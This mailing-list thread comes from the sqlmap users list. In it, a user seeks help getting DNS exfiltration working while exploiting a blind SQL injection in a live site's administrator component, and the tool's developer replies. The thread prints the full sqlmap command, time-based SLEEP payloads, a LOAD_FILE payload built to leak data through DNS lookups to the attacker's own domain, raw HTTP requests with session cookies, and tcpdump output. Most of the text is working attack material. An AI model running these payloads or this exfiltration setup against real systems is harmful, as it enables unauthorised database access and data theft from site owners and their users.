Re: [sqlmap-users] Problem with dns exfiltration

[Chris C. <ccl...@ou...>]

Miroslav,

Thanks for the reply.  I was looking at my tcpdump wrong.  The dns traffic I saw was from my sqlmap system itself looking up the target’s dns name, not the target (or any other host) querying for records on my domain.

So it seems that the target system isn’t sending dns queries out.  Anything else I can try, or am I just stuck with blind extraction here?


Here’s my sqlmap run and tcpdump if it helps:


sqlmap
==================================
root@Maple ~/s/g/sqlmap# ./sqlmap.py -u "https://ato.target.net/administrator/index.php?option=com_mcsearch&templateId=*/&view=searchtemplate" --random-agent --risk=3 --level=5 -a --dbms=mysql --threads=1 --predict-output --dns-domain=mydomain.net -v2 --banner --time-sec=10  --tamper=between --load-cookies=/root/cookies.txt

    sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:07:01

[13:07:01] [DEBUG] cleaning up configuration parameters
[13:07:01] [INFO] setting up DNS server instance
[13:07:01] [INFO] loading tamper script 'between'
[13:07:01] [DEBUG] setting the HTTP timeout
[13:07:01] [DEBUG] loading random HTTP User-Agent header(s) from file '/root/sectools/git/sqlmap/txt/user-agents.txt'
[13:07:01] [INFO] fetched random HTTP User-Agent header from file '/root/sectools/git/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2
[13:07:01] [DEBUG] setting the HTTP method to GET
[13:07:01] [DEBUG] creating HTTP requests opener object
[13:07:01] [INFO] loading cookies from '/root/cookies.txt'
[13:07:01] [DEBUG] forcing back-end DBMS to user defined value
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] 
[13:07:04] [INFO] testing connection to the target URL
[13:07:05] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: https://ato.target.net:443/administrator/index.php?option=com_mcsearch&templateId=-5154 OR 7979=SLEEP(10)-- MarC/&view=searchtemplate
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:07:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:07:05] [INFO] testing MySQL
[13:07:06] [WARNING] reflective value(s) found and filtering out
[13:07:06] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:07:38] [INFO] confirming MySQL
[13:07:38] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:08:20] [INFO] the back-end DBMS is MySQL
[13:08:20] [INFO] fetching banner
[13:08:20] [INFO] testing for data retrieval through DNS channel
[13:08:20] [DEBUG] performed 1 queries in 0.88 seconds
[13:08:20] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
[13:08:20] [INFO] retrieved: 5.0.95-log
[13:18:53] [DEBUG] performed 69 queries in 633.52 seconds
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.0.95-log'
==================================



tcpdump
==================================
root@Maple ~# tcpdump -nvvi eth0 port 53
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:35:44.667201 IP (tos 0x0, ttl 64, id 22920, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa7a3!] 61116+ A? ato.target.net. (38)
12:35:44.667229 IP (tos 0x0, ttl 64, id 22921, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x37e7!] 24158+ AAAA? ato.target.net. (38)
12:35:44.710564 IP (tos 0x0, ttl 45, id 824, offset 0, flags [none], proto UDP (17), length 151)
    8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 24158 q: AAAA? ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
12:35:44.711455 IP (tos 0x0, ttl 45, id 22553, offset 0, flags [none], proto UDP (17), length 82)
    8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 61116 q: A? ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
12:35:44.716854 IP (tos 0x0, ttl 64, id 22922, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa3b7!] 56658+ A? ato.target.net. (38)
12:35:44.716880 IP (tos 0x0, ttl 64, id 22923, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x6497!] 7256+ AAAA? ato.target.net. (38)
12:35:44.747848 IP (tos 0x0, ttl 45, id 22554, offset 0, flags [none], proto UDP (17), length 151)
    8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 7256 q: AAAA? ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
12:35:44.763158 IP (tos 0x0, ttl 45, id 49299, offset 0, flags [none], proto UDP (17), length 82)
    8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 56658 q: A? ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
==================================



Chris


On Jan 23, 2014, at 1:42 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Chris.
> 
> It looks quite right. It would be tremendously helpful if you could send a console output and a tcpdump (you can limit to only port 53) for a following run:
> 
> sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."
> 
> From your given description it looks like everything should be up and running.
> 
> Kind regards,
> Miroslav Stampar
> 
> 
> On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...> wrote:
> Hey all,
> 
> I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit and am trying to get dns exfil to work, but am not having any luck.
> 
> I start sqlmap as root with the —dns-domain option set to a domain that I control and have the sqlmap machine set as the authoritative NS for.  Running with a -v6, this is the info I get:
> 
> ===============================================
> [18:22:18] [INFO] testing for data retrieval through DNS channel
> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa
> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
> GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: gzip,deflate
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> 
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Cookie: Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
> Connection: close
> 
> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
> Content-length: 8627
> Content-encoding: gzip
> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly
> Expires: Mon, 1 Jan 2001 00:00:00 GMT
> Vary: Accept-Encoding
> Uri: https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
> Server: Apache
> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
> Connection: close
> Pragma: no-cache
> Cache-control: post-check=0, pre-check=0
> Date: Wed, 22 Jan 2014 23:22:20 GMT
> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
> Content-type: text/html; charset=utf-8
> 
> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
> ===============================================
> 
> If I run a tcpdump on the sqlmap machine, I see dns requests come in for “target.net” and if I do manual dns queries to the domain I own, sqlmap responds as expected with localhost.domain.com.
> 
> 
> Any idea?  Am I doing anything wrong?
> 
> 
> Chris
> 
> 
> ------------------------------------------------------------------------------
> CenturyLink Cloud: The Leader in Enterprise Cloud Services.
> Learn Why More Businesses Are Choosing CenturyLink Cloud For
> Critical Workloads, Development Environments & Everything In Between.
> Get a Quote or Start a Free Trial Today.
> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> 
> 
> 
> -- 
> Miroslav Stampar
> http://about.me/stamparm